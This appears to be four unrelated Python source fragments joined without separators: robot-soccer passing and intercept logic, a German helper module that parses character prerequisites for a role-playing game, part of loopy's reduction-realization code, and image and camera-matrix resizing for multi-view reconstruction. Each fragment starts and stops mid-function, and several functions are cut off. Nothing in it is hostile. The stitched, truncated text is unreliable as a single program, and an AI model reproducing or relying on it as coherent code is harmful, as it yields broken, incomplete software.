robot.behavior("RECEIVE_PASS") sleep(1) # TODO: avoid that robot gets the ball if it is closer to the other robot if not robot.hasBall(): _log("intercept fallback getBall") robot.getBall() """ # robust intercept wrapper # postcondition: robot has the ball # large intercept radius already helps a lot due to the fallback inside that function, # but we should be careful that other robot does not decide to go into fallback and interfere! zoneInterceptBall(x, y, phi, radius, repositionRadius) # fallback getBall (TODO also searchball? no, anticipate multiCam + it is unlikely that we let the ball slip away beyond vision) """ def _passToTeamMember(): sleep(SLEEP_SETTLE) # use motionPlanning pass action to first teammember, not teamplay friendPos = robot.getPosition(robot.teamMembers()[0]) _log("passing to (%6.2f, %6.2f)" % (friendPos.x, friendPos.y)) robot.passTo(friendPos.x, friendPos.y) sleep(SLEEP_AFTER_KICK) def _receivePass(radius=INTERCEPT_RADIUS_SMALL): # use zoneInterceptBall on current position pos = robot.ownPosition() _interceptWrapper(pos.x, pos.y, pos.Rz, radius=radius) # it exits only when robot has ball def _safeMove(*target): # We might need this wrapper because of the following things: # 1. when robot has fetched the ball, but there is an obstacle closeby, then tokyoDrift rotation will likely cause a collision # so we should first drive away from obstacle using robotspeed. # I consider this a limitation of pathPlanning, so in future it should be implemented there. # 2. if there is an obstacle at the target position, the robot will either never arrive (because pathPlanning obstacle avoidance will dance around it) # or push the obstacle aside, causing a collision. # 3. it might be the case that there is an obstacle between target position and ball, causing the robot to not see the ball anymore. # We do not want to explicitly search ball. # # Possible solution: use a new test-specific heightmap and corresponding action. Furthermore, start with a small drive-backwards fallback. # # TODO - see version in techChallenge branch -- can we avoid all that complexity by improving tp/pp? robot.move(*target) # TODO: behavior POSITION_TO_FREE_SPOT? ###### role and trick distribution ###### def TC18_run1(): # initialize _waitUntilBothActive() trickSequence = _determineTrickSequence() # might skip parts of sequence based on starting orientation # TODO: disable goal area obstacle avoidance - we want to be able to get a ball from goal # TODO tuning: reduce rotation speed&acc with ball to
# -*- coding: utf-8 -*- """ Created on Sat Feb 18 16:35:08 2017 @author: Aeolitus """ import Definitionen import logging import unicodedata import os import re from Wolke import Wolke import Objekte class VoraussetzungException(Exception): pass class WaffeneigenschaftException(Exception): pass class Hilfsmethoden: ''' Aufrufen entweder: import Hilfsmethoden Hilfsmethoden.Hilfsmethoden.XYZ oder from Hilfsmethoden import Hilfsmethoden Hilfsmethoden.XYZ ''' @staticmethod def GetWaffeneigenschaft(WaffeneigenschaftStr, Datenbank): weName = WaffeneigenschaftStr index = weName.find("(") if index != -1: weName = str.strip(weName[:index]) if not weName in Datenbank.waffeneigenschaften: raise WaffeneigenschaftException("Unbekannte Waffeneigenschaft '" + weName + "'") if index != -1: endIndex = WaffeneigenschaftStr[index:].find(")") if endIndex == -1: raise WaffeneigenschaftException("Parameter der Waffeneigenschaft '" + weName + "' müssen mit ')' abgeschlossen werden. Mehrere Parameter werden mit Semikolon getrennt.") return Datenbank.waffeneigenschaften[weName] @staticmethod def VerifyWaffeneigenschaft(WaffeneigenschaftStr, Datenbank): we = Hilfsmethoden.GetWaffeneigenschaft(WaffeneigenschaftStr, Datenbank) @staticmethod def FertStr2Array(FertString, Datenbank = None): ''' Fertigkeiten werden vom Nutzer Kommasepariert eingetragen. Diese Hilfsmethode trennt den String und gibt ein Array aus einzelnen Fertigkeiten zurück. ''' retArr = [] for itm in FertString.split(","): if len(itm) == 0: continue strpItm = itm.strip() if len(strpItm) > 0: if (Datenbank is None) or (strpItm in Datenbank.fertigkeiten ) or (strpItm in Datenbank.übernatürlicheFertigkeiten): retArr.append(strpItm) return retArr @staticmethod def FertArray2Str(Arr, Datenbank = None): ''' Verwandelt die Intern verwendeten Arrays von Fertigkeiten zurück in Strings. ''' retStr = "" if len(Arr) > 0: retStr = Arr[0] for itm in Arr[1:]: retStr += ", " retStr += itm return retStr @staticmethod def VorStr2Array(VoraussetzungenString, Datenbank): ''' Voraussetzungen werden vom User ebenfalls im Fließtext eingetragen. Das Format ist dabei im folgenden Illustriert: "Kein Vorteil Eisenaffine Aura, Attribut MU 8 ODER Vorteil Geweiht I ODER Vorteil Emphatie, Waffeneigenschaft Rüstungsbrechend" Groß- und Kleinschreibung sind wichtig! Kein geht nicht für Attribute. ''' delim = "~" retArr = [] for itm in VoraussetzungenString.split(","): if len(itm) == 0: continue arrItm = "" strpItm = itm.strip() if " ODER " in strpItm: subArr = [] for entr in strpItm.split(" ODER "): subArr.append(Hilfsmethoden.VorStr2Array(entr, Datenbank)) arrItm = subArr else: if strpItm.startswith("Vorteil "): if not (strpItm[8:] in Datenbank.vorteile): raise VoraussetzungException("Kann Vorteil '" + strpItm + "' in der Datenbank nicht finden.") arrItm = "V" + delim + strpItm[8:] + delim + "1" elif strpItm.startswith("Kein Vorteil "): if not (strpItm[13:] in Datenbank.vorteile): raise VoraussetzungException("Kann Vorteil '" + strpItm + "' in der Datenbank nicht finden.") arrItm = "V" + delim + strpItm[13:] + delim + "0" elif strpItm.startswith("Talent "): if not (strpItm[7:] in Datenbank.talente): raise VoraussetzungException("Kann Talent '" + strpItm + "' in der Datenbank nicht finden.") arrItm = "T" + delim + strpItm[7:] + delim + "1" elif strpItm.startswith("Waffeneigenschaft "): if (not (strpItm[18:] in Datenbank.waffeneigenschaften)) and strpItm[18:] != "Nahkampfwaffe" and strpItm[18:] != "Fernkampfwaffe": raise VoraussetzungException("Kann keine Waffeneigenschaft '" + strpItm + "' in der Datenbank finden.") arrItm = "W" + delim + strpItm[18:] + delim + "1" elif strpItm.startswith("Attribut "): attribut = strpItm[9:11] if attribut in Definitionen.Attribute: try: wert = int(strpItm[12:]) arrItm = "A" + delim + attribut + delim + str(wert) except ValueError: raise VoraussetzungException("Der angegebene Attribut-Wert '" + strpItm[12:] + "' ist keine gültige Zahl.") else: raise VoraussetzungException("Das angegebene Attribut '" + attribut + "' ist ungültig. Unterstützt werden 'KO', 'MU', 'GE', 'KK', 'IN', 'KL', 'CH' und 'FF'") elif strpItm.startswith("MeisterAttribut "): attribut = strpItm[16:18] if attribut in Definitionen.Attribute: try: wert = int(strpItm[19:]) arrItm = "M" + delim + attribut + delim + str(wert) except ValueError: raise VoraussetzungException("Der angegebene Attribut-Wert '" + strpItm[19:] + "' ist keine gültige Zahl.") else: raise VoraussetzungException("Das angegebene Attribut '" + attribut + "' ist ungültig. Unterstützt werden 'KO', 'MU', 'GE', 'KK', 'IN', 'KL', 'CH' und 'FF'") elif strpItm.startswith("Übernatürliche-Fertigkeit "): if not strpItm[26] == "'": raise VoraussetzungException("Der Name einer Übernatürlichen Fertigkeit muss in Apostrophen gefasst werden. (" + strpItm + ")") strpItm = strpItm[27:] index = strpItm.find("'") if index == -1: raise VoraussetzungException("Der Name einer Übernatürlichen Fertigkeit muss in Apostrophen gefasst werden. (" + strpItm + ")") fertigkeit = strpItm[:index] if not (fertigkeit in Datenbank.übernatürlicheFertigkeiten): raise VoraussetzungException("Kann Übernatürliche Fertigkeit '" + fertigkeit + "' in der Datenbank nicht finden.") try: wert = int(strpItm[index+2:]) arrItm = "U" + delim + fertigkeit + delim + str(wert) except ValueError: raise VoraussetzungException("Der angegebene Fertigkeitswert '" + strpItm[index+2:] + "' ist keine gültige Zahl") elif strpItm.startswith("Fertigkeit "): if not strpItm[11] == "'": raise VoraussetzungException("Der Name einer Fertigkeit muss in Apostrophen gefasst werden. . (" + strpItm + ")") strpItm = strpItm[12:] index = strpItm.find("'") if index == -1: raise VoraussetzungException("Der Name einer Fertigkeit muss in Apostrophen gefasst werden. . (" + strpItm + ")") fertigkeit = strpItm[:index] if not (fertigkeit in Datenbank.fertigkeiten): raise VoraussetzungException("Kann Fertigkeit '" + fertigkeit + "' in der Datenbank nicht finden.") try: wert = int(strpItm[index+2:]) arrItm = "F" + delim + fertigkeit + delim + str(wert) except ValueError: raise VoraussetzungException("Der angegebene Fertigkeitswert '" + strpItm[index+2:] + "' ist keine gültige Zahl") else: raise VoraussetzungException("Unbekanntes Schlüsselwort '" + strpItm + "'. Unterstützt werden 'Vorteil', 'Kein Vorteil', 'Waffeneigenschaft', 'Attribut', 'MeisterAttribut', 'Übernatürliche-Fertigkeit' und 'Fertigkeit'.") retArr.append(arrItm) return retArr @staticmethod def VorArray2Str(VoraussetzungenArray, Datenbank = None): delim = "~" retArr = [] retStr = "" for itm in VoraussetzungenArray: if type(itm) is list: orArr = [] orStr = "" for part in itm: orArr.append(Hilfsmethoden.VorArray2Str(part, Datenbank)) if len(orArr) > 0: orStr = orArr[0] if len(orArr) > 1: for ent in orArr[1:]: orStr += " ODER " + ent if orStr != "": retArr.append(orStr) else: arr = itm.split(delim) enStr = "" if arr[0] == "V": if arr[2] == "1": enStr += "Vorteil " else: enStr += "Kein Vorteil " enStr += arr[1] elif arr[0] == "T": enStr += "Talent " enStr += arr[1] elif arr[0] == "W": enStr += "Waffeneigenschaft " enStr += arr[1] elif arr[0] == "A": enStr += "Attribut " enStr += arr[1] enStr += " " enStr += str(arr[2]) elif arr[0] == "M": enStr += "MeisterAttribut " enStr += arr[1] enStr += " " enStr += str(arr[2]) elif arr[0] == "U": enStr += "Übernatürliche-Fertigkeit " enStr += "'" + arr[1] + "' " enStr += str(arr[2]) elif arr[0] == "F": enStr += "Fertigkeit " enStr += "'" + arr[1] + "' " enStr += str(arr[2]) if enStr != "": retArr.append(enStr) if len(retArr) > 0: retStr = retArr[0] if len(retArr) > 1: for itm in retArr[1:]: if len(itm) > 0: retStr += ", " + itm return retStr @staticmethod def voraussetzungenPrüfen(vorteile, waffen, attribute, übernatürlicheFertigkeiten, fertigkeiten, voraussetzungen): return Hilfsmethoden.__voraussetzungenPrüfen(vorteile, waffen, attribute, übernatürlicheFertigkeiten, fertigkeiten, voraussetzungen, False) @staticmethod def __voraussetzungenPrüfen(vorteile, waffen, attribute, übernatürlicheFertigkeiten, fertigkeiten, voraussetzungen, Or): ''' Prüft, ob ein Array von Voraussetzungen erfüllt ist. Format: ['L:Str:W', 'L:Str:W'] Dabei ist L: V für Vorteil - prüft, ob ein Vorteil vorhanden ist. W = 1 bedeutet, der Vorteil muss vorhanden sein. W=0 bedeutet, der Vorteil darf nicht vorhanden sein. T für Talent - prüft, ob der Charakter ein Talent mit dem angegebenen Namen besitzt. W ist immer 1. W für Waffeneigenschaft - prüft, ob der Charakter eine Waffe mit der angegebenen Eigenschaft besitzt. W ist immer 1. A für Attribut - prüft, ob das Attribut mit Key Str mindestens auf Wert W ist M für MeisterAttribut - wie Attribut, prüft außerdem ob zwei weitere Attribute auf insg. mindestens 16 sind U für Übernatürliche Fertigkeit - prüft, ob für die Übernatürliche Fertigkeit mit Key Str die Voraussetzungen erfüllt sind \ und sie mindestens auf Wert W ist. W=-1 hat ein spezielle Bedeutung, hier wird an Stelle des Fertigkeitswerts überprüft ob mindestens ein Talent aktiviert ist. F für Fertigkeit - prüft, ob für die Übernatürliche Fertigkeit mit Key Str die Voraussetzungen erfüllt sind und sie mindestens auf Wert W ist. Einträge im Array können auch weitere Arrays and Voraussetzungen sein. Aus diesen Arrays muss nur ein Eintrag erfüllt sein. Wenn Wolke.Reqs nicht gesetzt ist, gibt die Methode immer True zurück. ''' if not Wolke.Reqs: return True #Gehe über alle Elemente in der Liste retNor = True retOr = False for voraus in voraussetzungen: erfüllt
return prim.If(rec_cond, self.rec(expr.then, callables_table=callables_table, guarding_predicates=( guarding_predicates | frozenset([rec_cond])), nresults=nresults), self.rec(expr.else_, callables_table=callables_table, guarding_predicates=( guarding_predicates | frozenset([prim.LogicalNot(rec_cond)])), nresults=nresults)) # @remove_any_newly_unused_inames def realize_reduction_for_single_kernel(kernel, callables_table, insn_id_filter=None, unknown_types_ok=True, automagic_scans_ok=False, force_scan=False, force_outer_iname_for_scan=None): """Rewrites reductions into their imperative form. With *insn_id_filter* specified, operate only on the instruction with an instruction id matching *insn_id_filter*. If *insn_id_filter* is given, only the outermost level of reductions will be expanded, inner reductions will be left alone (because they end up in a new instruction with a different ID, which doesn't match the filter). If *insn_id_filter* is not given, all reductions in all instructions will be realized. If *automagic_scans_ok*, this function will attempt to rewrite triangular reductions as scans automatically. If *force_scan* is *True*, this function will attempt to rewrite *all* candidate reductions as scans and raise an error if this is not possible (this is most useful combined with *insn_id_filter*). If *force_outer_iname_for_scan* is not *None*, this function will attempt to realize candidate reductions as scans using the specified iname as the outer (sweep) iname. """ logger.debug("%s: realize reduction" % kernel.name) new_insns = [] new_iname_tags = {} insn_id_gen = kernel.get_instruction_id_generator() var_name_gen = kernel.get_var_name_generator() new_temporary_variables = kernel.temporary_variables.copy() inames_added_for_scan = set() inames_to_remove = set() # {{{ helpers def _strip_if_scalar(reference, val): if len(reference) == 1: return val[0] else: return val def preprocess_scan_arguments( insn, expr, nresults, scan_iname, track_iname, newly_generated_insn_id_set): """Does iname substitution within scan arguments and returns a set of values suitable to be passed to the binary op. Returns a tuple.""" if nresults > 1: inner_expr = expr # In the case of a multi-argument scan, we need a name for each of # the arguments in order to pass them to the binary op - so we expand # items that are not "plain" tuples here. if not isinstance(inner_expr, tuple): get_args_insn_id = insn_id_gen( "{}_{}_get".format(insn.id, "_".join(expr.inames))) inner_expr = expand_inner_reduction( id=get_args_insn_id, expr=inner_expr, nresults=nresults, depends_on=insn.depends_on, within_inames=insn.within_inames | expr.inames, within_inames_is_final=insn.within_inames_is_final, predicates=insn.predicates, ) newly_generated_insn_id_set.add(get_args_insn_id) updated_inner_exprs = tuple( replace_var_within_expr(sub_expr, scan_iname, track_iname) for sub_expr in inner_expr) else: updated_inner_exprs = ( replace_var_within_expr(expr, scan_iname, track_iname),) return updated_inner_exprs def expand_inner_reduction(id, expr, nresults, depends_on, within_inames, within_inames_is_final, predicates): # FIXME: use make_temporaries from pymbolic.primitives import Call from loopy.symbolic import Reduction assert isinstance(expr, (Call, Reduction)) temp_var_names = [ var_name_gen(id + "_arg" + str(i)) for i in range(nresults)] for name in temp_var_names: from loopy.kernel.data import TemporaryVariable, AddressSpace new_temporary_variables[name] = TemporaryVariable( name=name, shape=(), dtype=None, address_space=AddressSpace.PRIVATE) from pymbolic import var temp_vars = tuple(var(n) for n in temp_var_names) call_insn = make_assignment( id=id, assignees=temp_vars, expression=expr, depends_on=depends_on, within_inames=within_inames, within_inames_is_final=within_inames_is_final, predicates=predicates) generated_insns.append(call_insn) return temp_vars # }}} # {{{ sequential def map_reduction_seq(expr, rec, callables_table, nresults, arg_dtypes, reduction_dtypes, guarding_predicates): outer_insn_inames = insn.within_inames from loopy.kernel.data import AddressSpace acc_var_names = make_temporaries( name_based_on="acc_"+"_".join(expr.inames), nvars=nresults, shape=(), dtypes=reduction_dtypes, address_space=AddressSpace.PRIVATE) init_insn_depends_on = frozenset() # check first that the original kernel had global barriers # if not, we don't need to check. Since the function # kernel_has_global_barriers is cached, we don't do # extra work compared to not checking. # FIXME: Explain why we care about global barriers her if kernel_has_global_barriers(kernel): global_barrier = lp.find_most_recent_global_barrier(temp_kernel, insn.id) if global_barrier is not None: init_insn_depends_on |= frozenset([global_barrier]) from pymbolic import var acc_vars = tuple(var(n) for n in acc_var_names) init_id = insn_id_gen( "{}_{}_init".format(insn.id, "_".join(expr.inames))) expression, callables_table = expr.operation.neutral_element( *arg_dtypes, callables_table=callables_table, target=kernel.target) init_insn = make_assignment( id=init_id, assignees=acc_vars, within_inames=outer_insn_inames - frozenset(expr.inames), within_inames_is_final=insn.within_inames_is_final, depends_on=init_insn_depends_on, expression=expression, # Do not inherit predicates: Those might read variables # that may not yet be set, and we don't have a great way # of figuring out what the dependencies of the accumulator # initializer should be. # This way, we may initialize a few too many accumulators, # but that's better than being incorrect. # https://github.com/inducer/loopy/issues/231 ) generated_insns.append(init_insn) update_id = insn_id_gen( based_on="{}_{}_update".format(insn.id, "_".join(expr.inames))) update_insn_iname_deps = insn.within_inames | set(expr.inames) if insn.within_inames_is_final: update_insn_iname_deps = insn.within_inames | set(expr.inames) reduction_insn_depends_on = {init_id} # In the case of a multi-argument reduction, we need a name for each of # the arguments in order to pass them to the binary op - so we expand # items that are not "plain" tuples here. if nresults > 1 and not isinstance(expr.expr, tuple): get_args_insn_id = insn_id_gen( "{}_{}_get".format(insn.id, "_".join(expr.inames))) reduction_expr = expand_inner_reduction( id=get_args_insn_id, expr=expr.expr, nresults=nresults, depends_on=insn.depends_on, within_inames=update_insn_iname_deps, within_inames_is_final=insn.within_inames_is_final, predicates=guarding_predicates, ) reduction_insn_depends_on.add(get_args_insn_id) else: reduction_expr = expr.expr expression, callables_table = expr.operation( arg_dtypes, _strip_if_scalar(acc_vars, acc_vars), reduction_expr, callables_table, kernel.target) reduction_insn = make_assignment( id=update_id, assignees=acc_vars, expression=expression, depends_on=frozenset(reduction_insn_depends_on) | insn.depends_on, within_inames=update_insn_iname_deps, within_inames_is_final=insn.within_inames_is_final, predicates=guarding_predicates,) generated_insns.append(reduction_insn) new_insn_add_depends_on.add(reduction_insn.id) if nresults == 1: assert len(acc_vars) == 1 return acc_vars[0], callables_table else: return acc_vars, callables_table # }}} # {{{ local-parallel def _get_int_iname_size(iname): from loopy.isl_helpers import static_max_of_pw_aff from loopy.symbolic import pw_aff_to_expr size = pw_aff_to_expr( static_max_of_pw_aff( kernel.get_iname_bounds(iname).size, constants_only=True)) assert isinstance(size, int) return size def _make_slab_set(iname, size): v = isl.make_zero_and_vars([iname]) bs, = ( v[0].le_set(v[iname]) & v[iname].lt_set(v[0] + size)).get_basic_sets() return bs def _make_slab_set_from_range(iname, lbound, ubound): v = isl.make_zero_and_vars([iname]) bs, = ( v[iname].ge_set(v[0] + lbound) & v[iname].lt_set(v[0] + ubound)).get_basic_sets() return bs def map_reduction_local(expr, rec, callables_table, nresults, arg_dtypes, reduction_dtypes, guarding_predicates): red_iname, = expr.inames size = _get_int_iname_size(red_iname) outer_insn_inames = insn.within_inames from loopy.kernel.data import LocalInameTagBase outer_local_inames = tuple(oiname for oiname in outer_insn_inames if kernel.iname_tags_of_type(oiname, LocalInameTagBase)) from pymbolic import var outer_local_iname_vars = tuple( var(oiname) for oiname in outer_local_inames) outer_local_iname_sizes = tuple( _get_int_iname_size(oiname) for oiname in outer_local_inames) from loopy.kernel.data import AddressSpace neutral_var_names = make_temporaries( name_based_on="neutral_"+red_iname, nvars=nresults, shape=(), dtypes=reduction_dtypes, address_space=AddressSpace.PRIVATE) acc_var_names = make_temporaries( name_based_on="acc_"+red_iname, nvars=nresults, shape=outer_local_iname_sizes + (size,), dtypes=reduction_dtypes, address_space=AddressSpace.LOCAL) acc_vars = tuple(var(n) for n in acc_var_names) # {{{ add separate iname to carry out the reduction # Doing this sheds any odd conditionals that may be active # on our red_iname. base_exec_iname = var_name_gen("red_"+red_iname) domains.append(_make_slab_set(base_exec_iname, size)) new_iname_tags[base_exec_iname] = kernel.iname_tags(red_iname) # }}} base_iname_deps = outer_insn_inames - frozenset(expr.inames) neutral, callables_table = expr.operation.neutral_element(*arg_dtypes, callables_table=callables_table, target=kernel.target) init_id = insn_id_gen(f"{insn.id}_{red_iname}_init") init_insn = make_assignment( id=init_id, assignees=tuple( acc_var[outer_local_iname_vars + (var(base_exec_iname),)] for acc_var in acc_vars), expression=neutral, within_inames=base_iname_deps | frozenset([base_exec_iname]), within_inames_is_final=insn.within_inames_is_final, depends_on=frozenset(), # Do not inherit predicates: Those might read variables # that may not yet be set, and we don't have a great way # of figuring out what the dependencies of the accumulator # initializer should be. # This way, we may initialize a few too many accumulators, # but that's better than being incorrect. # https://github.com/inducer/loopy/issues/231 ) generated_insns.append(init_insn) init_neutral_id = insn_id_gen(f"{insn.id}_{red_iname}_init_neutral") init_neutral_insn = make_assignment( id=init_neutral_id, assignees=tuple(var(nvn) for nvn in neutral_var_names), expression=neutral, within_inames=base_iname_deps | frozenset([base_exec_iname]), within_inames_is_final=insn.within_inames_is_final, depends_on=frozenset(), predicates=guarding_predicates, ) generated_insns.append(init_neutral_insn) transfer_depends_on = {init_neutral_id, init_id} # In the case of a multi-argument reduction, we need a name for each of # the arguments in order to pass them to the binary op - so we expand # items that are not "plain" tuples here. if nresults > 1 and not isinstance(expr.expr, tuple): get_args_insn_id = insn_id_gen( f"{insn.id}_{red_iname}_get") reduction_expr = expand_inner_reduction( id=get_args_insn_id, expr=expr.expr, nresults=nresults, depends_on=insn.depends_on, within_inames=( (outer_insn_inames - frozenset(expr.inames)) | frozenset([red_iname])), within_inames_is_final=insn.within_inames_is_final, predicates=guarding_predicates, ) transfer_depends_on.add(get_args_insn_id) else: reduction_expr = expr.expr transfer_id = insn_id_gen(f"{insn.id}_{red_iname}_transfer") expression, callables_table = expr.operation( arg_dtypes, _strip_if_scalar( neutral_var_names, tuple(var(nvn) for nvn in neutral_var_names)), reduction_expr, callables_table, kernel.target) transfer_insn = make_assignment( id=transfer_id, assignees=tuple( acc_var[outer_local_iname_vars + (var(red_iname),)] for acc_var in acc_vars), expression=expression, within_inames=( (outer_insn_inames - frozenset(expr.inames)) | frozenset([red_iname])), within_inames_is_final=insn.within_inames_is_final, depends_on=frozenset([init_id, init_neutral_id]) | insn.depends_on, no_sync_with=frozenset([(init_id, "any")]), predicates=insn.predicates, ) generated_insns.append(transfer_insn) cur_size = 1 while cur_size < size: cur_size *= 2 prev_id = transfer_id bound = size stage_exec_iname = None istage = 0 while cur_size > 1: new_size = cur_size // 2 assert new_size * 2 == cur_size stage_exec_iname = var_name_gen("red_%s_s%d" % (red_iname, istage)) domains.append(_make_slab_set(stage_exec_iname, bound-new_size)) new_iname_tags[stage_exec_iname] = kernel.iname_tags(red_iname) stage_id = insn_id_gen("red_%s_stage_%d" % (red_iname, istage)) expression, callables_table = expr.operation( arg_dtypes, _strip_if_scalar(acc_vars, tuple( acc_var[ outer_local_iname_vars + (var(stage_exec_iname),)] for acc_var in acc_vars)), _strip_if_scalar(acc_vars, tuple( acc_var[ outer_local_iname_vars + ( var(stage_exec_iname) + new_size,)] for acc_var in acc_vars)), callables_table, kernel.target) stage_insn = make_assignment( id=stage_id, assignees=tuple( acc_var[outer_local_iname_vars + (var(stage_exec_iname),)] for acc_var in acc_vars), expression=expression, within_inames=( base_iname_deps | frozenset([stage_exec_iname])), within_inames_is_final=insn.within_inames_is_final, depends_on=frozenset([prev_id]), predicates=insn.predicates, ) generated_insns.append(stage_insn) prev_id = stage_id cur_size = new_size bound = cur_size istage += 1 new_insn_add_depends_on.add(prev_id) new_insn_add_no_sync_with.add((prev_id, "any")) new_insn_add_within_inames.add(stage_exec_iname or base_exec_iname) if nresults == 1: assert len(acc_vars) == 1 return acc_vars[0][outer_local_iname_vars + (0,)], callables_table else: return [acc_var[outer_local_iname_vars + (0,)] for acc_var in acc_vars], callables_table # }}} # {{{ utils (stateful) from pytools import memoize @memoize def get_or_add_sweep_tracking_iname_and_domain( scan_iname,
np.max(img_h, axis=2) # (N_Ms, N_pts) img_w_max = np.max(img_w, axis=2) img_h_min = np.min(img_h, axis=2) img_w_min = np.min(img_w, axis=2) img_h_resol = (img_h_max - img_h_min + 0.0) / _cube_D_ img_w_resol = (img_w_max - img_w_min + 0.0) / _cube_D_ compress_h = compress_ratio * img_h_resol.mean() / image_compress_multiple compress_w = compress_ratio * img_w_resol.mean() / image_compress_multiple return ((compress_h), (compress_w)) # def resize_matrix(projection_M, compress_h_new, compress_w_new): # transform_matrix = np.array([[[1 / compress_w_new, 0, 0], [0, 1 / compress_h_new, 0], [0, 0, 1]]]) # projection_M_new = np.matmul(transform_matrix, projection_M) # # cameraTs = cameraPs2Ts(projection_M) # cameraTs_new = cameraPs2Ts(projection_M_new) # trans_vector = (cameraTs - cameraTs_new)[:, :, None] # identical_matrix = np.repeat(np.array([[[1, 0, 0], [0, 1, 0], [0, 0, 1]]]), cameraTs.shape[0], axis=0) # bottom_matrix = np.repeat(np.array([[[0, 0, 0, 1]]]), cameraTs.shape[0], axis=0) # transform_matrix2 = np.concatenate((identical_matrix, trans_vector), axis=2) # transform_matrix2 = np.concatenate((transform_matrix2, bottom_matrix), axis=1) # projection_M_new_f = np.concatenate((projection_M_new, bottom_matrix), axis=1) # # projection_M_new = np.matmul(transform_matrix2, projection_M_new_f) # projection_M_new = projection_M_new[:, :3, :] # return projection_M_new def resize_image_and_matrix(images, projection_M, cube_xyz_min, cube_D_mm, _cube_D_, image_compress_multiple, return_list=False, compress_ratio=1.0): ''' compress image and garantee the camera position is not changing :param images: all images of one model type:list or None if list list element: image array shape: (img_h,img_w, 3) :param projection_M: camera matrix shape: (N_views, 3, 4) :param cube_xyz_min: min xyz coordinate shape: (3,) / (N_pts, 3) usually it is (3,) because we only sample one cubic to judge the resize term :param cube_D_mm: cubic length float :param _cube_D_: cubic size int :param image_compress_multiple: same as param.image_compress_multiple :param return_list: bool if False return the numpy array :param compress_ratio see self.params.compress_ratio :return: if image is not None images_resized:resized image shape:(N_view, img_h_new, img_w_new)resize_image_and_matrix projection_M_new: new cameraP shape:(N_view,3,4) (compress_h_new,compress_w_new):(float,float) elif image is None: only change the matrix projection_M_new: new cameraP shape:(N_view,3,4) (compress_h_new,compress_w_new):(float,float) ''' (compress_h, compress_w) = image_compress_coef(projection_M, cube_xyz_min, cube_D_mm, _cube_D_, image_compress_multiple, compress_ratio=compress_ratio) resized_h = int(image_compress_multiple * (images[0].shape[0] // (compress_h * image_compress_multiple))) resized_w = int(image_compress_multiple * (images[0].shape[1] // (compress_w * image_compress_multiple))) compress_h_new = images[0].shape[0] / (resized_h + 0.0) compress_w_new = images[0].shape[1] / (resized_w + 0.0) transform_matrix = np.array([[[1 / compress_w_new, 0, 0], [0, 1 / compress_h_new, 0], [0, 0, 1]]]) projection_M_new = np.matmul(transform_matrix, projection_M) cameraTs = cameraPs2Ts(projection_M) cameraTs_new = cameraPs2Ts(projection_M_new) trans_vector = (cameraTs - cameraTs_new)[:, :, None] identical_matrix = np.repeat(np.array([[[1, 0, 0], [0, 1, 0], [0, 0, 1]]]), cameraTs.shape[0], axis=0) bottom_matrix = np.repeat(np.array([[[0, 0, 0, 1]]]), cameraTs.shape[0], axis=0) transform_matrix2 = np.concatenate((identical_matrix, trans_vector), axis=2) transform_matrix2 = np.concatenate((transform_matrix2, bottom_matrix), axis=1) projection_M_new_f = np.concatenate((projection_M_new, bottom_matrix), axis=1) projection_M_new = np.matmul(transform_matrix2, projection_M_new_f) projection_M_new = projection_M_new[:, :3, :] image_resized_list = [] if (images is not None): for image in images: image_resized = scipy.misc.imresize(image, size=(resized_h, resized_w), interp='bicubic') image_resized = image_resized / 256.0 - 0.5 image_resized_list.append(image_resized) images_resized = image_resized_list if return_list else np.stack(image_resized_list) return (images_resized, projection_M_new, (compress_h_new, compress_w_new)) else: return (None, projection_M_new, (compress_h_new, compress_w_new)) # def resize_multistage_image_and_matrix(images, # projection_M, # cube_xyz_min, # cube_D_mm, # _cube_D_, # image_compress_multiple, # image_compress_stage, # return_list=False, # compress_ratio=1.0): # ''' # compress image and garantee the camera position is not changing # :param images: all images of one model # type:list or None # if list # list element: image array # shape: (img_h,img_w, 3) # # :param projection_M: camera matrix # shape: (N_views, 3, 4) # :param cube_xyz_min: min xyz coordinate # shape: (3,) / (N_pts, 3) usually it is (3,) because we only sample one cubic to judge the resize term # :param cube_D_mm: # cubic length float # :param _cube_D_: # cubic size int # :param image_compress_multiple: # same as param.image_compress_multiple # :param image_compress_stage # same as param.image_compress_stage # :param return_list: bool # if False return the numpy array # :param compress_ratio # see self.params.compress_ratio # :return: # if image is not None # image_resized_stage_list:multistage of resized image # length : = image_compress_stage # ele in each list: # shape:(N_view, img_h_new//2**iter, img_w_new//2**iter) # projection_M_new: new cameraP # shape:(N_view,3,4) # (compress_h_new,compress_w_new):(float,float) # elif image is None: only change the matrix # projection_M_new: new cameraP # shape:(N_view,3,4) # (compress_h_new,compress_w_new):(float,float) # ''' # # (compress_h, compress_w) = image_compress_coef(projection_M, # # cube_xyz_min, # # cube_D_mm, # # _cube_D_, # # 1, # # compress_ratio = compress_ratio) # # # print('compress_h', compress_h, compress_w) # compress_h = compress_ratio # compress_w = compress_ratio # resized_h = int(image_compress_multiple * (images[0].shape[0] // (compress_h * image_compress_multiple))) # resized_w = int(image_compress_multiple * (images[0].shape[1] // (compress_w * image_compress_multiple))) # # # pdb.set_trace() # compress_h_new = images[0].shape[0] / (resized_h + 0.0) # compress_w_new = images[0].shape[1] / (resized_w + 0.0) # transform_matrix = np.array([[[1 / compress_w_new, 0, 0], [0, 1 / compress_h_new, 0], [0, 0, 1]]]) # projection_M_new = np.matmul(transform_matrix, projection_M) # # cameraTs = cameraPs2Ts(projection_M) # cameraTs_new = cameraPs2Ts(projection_M_new) # trans_vector = (cameraTs - cameraTs_new)[:, :, None] # identical_matrix = np.repeat(np.array([[[1, 0, 0], [0, 1, 0], [0, 0, 1]]]), cameraTs.shape[0], axis=0) # bottom_matrix = np.repeat(np.array([[[0, 0, 0, 1]]]), cameraTs.shape[0], axis=0) # transform_matrix2 = np.concatenate((identical_matrix, trans_vector), axis=2) # transform_matrix2 = np.concatenate((transform_matrix2, bottom_matrix), axis=1) # projection_M_new_f = np.concatenate((projection_M_new, bottom_matrix), axis=1) # # projection_M_new = np.matmul(transform_matrix2, projection_M_new_f) # projection_M_new = projection_M_new[:, :3, :] # # if (images is not None): # image_resized_stage_list = [] # for iter in range(image_compress_stage): # image_resized_list = [] # for image in images: # # print('resized image shape',resized_h, resized_w) # image_resized = scipy.misc.imresize(image, # size=(int(resized_h // (2 ** iter)), int(resized_w // (2 ** iter))), # interp='bicubic') # image_resized = image_resized / 256.0 - 0.5 # image_resized_list.append(image_resized) # images_resized = image_resized_list if return_list else np.stack(image_resized_list) # image_resized_stage_list.append(images_resized) # return (image_resized_stage_list, projection_M_new, (compress_h_new, compress_w_new)) # else: # return (None, projection_M_new, (compress_h_new, compress_w_new)) def 